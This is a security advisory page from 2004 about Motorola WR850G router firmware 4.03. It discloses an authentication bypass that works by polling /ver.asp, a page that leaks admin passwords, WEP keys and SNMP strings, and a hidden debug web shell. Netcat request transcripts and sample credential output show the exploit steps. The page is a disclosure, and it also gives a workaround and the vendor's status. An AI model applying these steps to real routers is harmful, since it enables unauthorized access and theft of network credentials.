Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key).	Motorola Wireless Router WR850G Authentication Circumvention 27 Sep. 2004    Summary "Motorola's WR850G Wireless Broadband Router, is built with both an 802.11g wireless access point and a 4-port Ethernet router. It's wireless. It's wired. It's the foundation of a truly customized network and it's full of options." The firmware of Motorola's wireless router WR850G features a flaw that enables an attacker to log into the routers web interface without knowing the username/password combination and gain knowledge of the router's username and password after logging in. Additionally the firmware contains an easter egg that provides a user with a root shell on the router's Linux software. However this root shell can only be opened after a successful authentication.   Credit: The information has been provided by Daniel Fabian. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Motorola Wireless Router WR850G, Firmware v4.03 Authentication Circumvention: One limitation of the routers firmware is that only one system at a time can be logged into the web interface. However it does not correctly keep track of the currently logged in system, making it possible for an attacker to log into the web interface without having to know a username or a password. All an attacker has to do is to periodically poll for a file on the router's web server that can only be accessed when logged into the router (most likely this is going to be the file /ver.asp; see the second described vulnerability). The attacker will get 302 redirect messages, as long as nobody is logged in. However as soon as someone knowing the password (ie. the real system administrator) logs into the web interface from a different system (might either be behind the router, on in front of it), not the system administrator is granted access, but the attacker. Example: server:/var/www/htdocs# nc 10.10.69.244 8080 GET /ver.asp HTTP/1.0 HTTP/1.0 302 Redirect Server: httpd Date: Thu, 02 Sep 2004 14:30:15 GMT Location: redirect.asp Content-Type: text/xml Connection: close [Administrator (on a different IP) successfully logs in] server:/var/www/htdocs# nc 10.10.69.244 8080 GET /ver.asp HTTP/1.0 HTTP/1.0 200 Ok Server: httpd Date: Thu, 02 Sep 2004 14:32:37 GMT Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: text/html Connection: close [snip content] The administrator trying to log in gets the error message: 403 Only one login allowed The existing client:192.168.107.58 This at least tells the administrator someone is tempering with his system. Password Recovery: The router's web server contains a page named ver.asp that contains an output of every single configuration switch of the router. Among those switches are:  * Web Interface Username and Password  * WEP Encryption Keys  * SNMP Community String  * DDNS password And so on... The page can only be accessed when logged into the web interface either by knowing the username and password, or by using the method described above. Exploit: server:/var/www/htdocs# nc 80.108.69.244 8080 GET /ver.asp HTTP/1.0 HTTP/1.0 200 Ok Server: httpd Date: Thu, 02 Sep 2004 13:40:09 GMT Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: text/html Connection: close [A short excerpt of the output:] Pmon Version: 9 Firmware version: 4.03, April.15, 2004 pptp_passwd= http_username=admin wl0_ssid=hugo wl0_key1=a3b6d3351f http_passwd=strictlysecret wl_passphrase=tumbledry radius_key= SNMPCommunityOne=public Easter Egg: Root Shell Additionally to the page ver.asp, the routers web server also contains a page named frame_debug.asp that contains a web shell where a user can execute any command on the routers software. The page can only be accessed when logged into the web interface either by knowing the username and password, or by using the method described above. Example: #cat /proc/version Linux version 2.4.20 (sparklan@localhost.localdomain) (gcc version 3.0 20010422 (prerelease) with bcm4710a0 modifications) #37 Thu Apr 15 16:34:09 CST 2004 #uptime 2:56pm up 7:33, load average: 0.59, 0.23, 0.09 #cat /proc/cpuinfo system type : Broadcom BCM947XX processor : 0 cpu model : BCM4710 V0.0 BogoMIPS : 82.94 wait instruction : no microsecond timers : yes tlb_entries : 32 extra interrupt vector : no hardware watchpoint : no VCED exceptions : not available VCEI exceptions : not available dcache hits : 3694025514 dcache misses : 3395654302 icache hits : 3303822179 icache misses : 3094738920 instructions : 2214575440 Workarounds: Even though this does not resolve the vulnerabilities, the web interface should be configured to only listen to the LAN and not the WAN interface. This at least eliminates the risk of being hacked from the outside, while it is still possible for an insider to gain the passwords in the way described above. Vendor Status: Vendor contacted (09-02-2004 and 09-09-2004). No patch available.  Comments:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles LedgerSMB Multiple Vulnerabilities Kaspersky Lab Multiple Products Local Privilege Escalation Vulnerability Piwik Cookie Unserialize Vulnerability Invision Power Board SQL PHP File Inclusion and SQL Injection U.S. Defense Information Systems Agency (DISA) Unix Security Readiness Review (SRR) Vulnerability DevIL DICOM Buffer Overflow Vulnerability Marvell Driver Multiple Information Element Overflows HP Data Protector Express and Single Server Edition (SSE) DoS and Code Execution HP Color LaserJet Printers Unauthorized Access to Data and DoS KDE KDELibs Remote Array Overrun with Arbitrary Code Execution Gimp BMP Image Parsing Integer Overflow Vulnerability Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation WordPress Unrestricted File Upload Arbitrary PHP Code Execution Atheros Driver Reserved Frame DoS Vulnerability McAfee Security Manager Authentication Bypass and Session Hijacking Vulnerability  Featured Articles Microsoft Embedded OpenType Font Engine Heap Buffer Overflow (MS09-029) Virtualmin Multiple Vulnerabilities Microsoft WordPad Word97 Converter Stack Buffer Overflow Vulnerability (MS09-010) WordPress Unchecked Privileges in admin.php and Multiple Information Disclosures Microsoft PowerPoint Conversion Filter Heap Corruption Vulnerability (MS09-017) Adobe Shockwave Player Director File Parsing Pointer Overwrite Mozilla Firefox Java Applet Loading Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®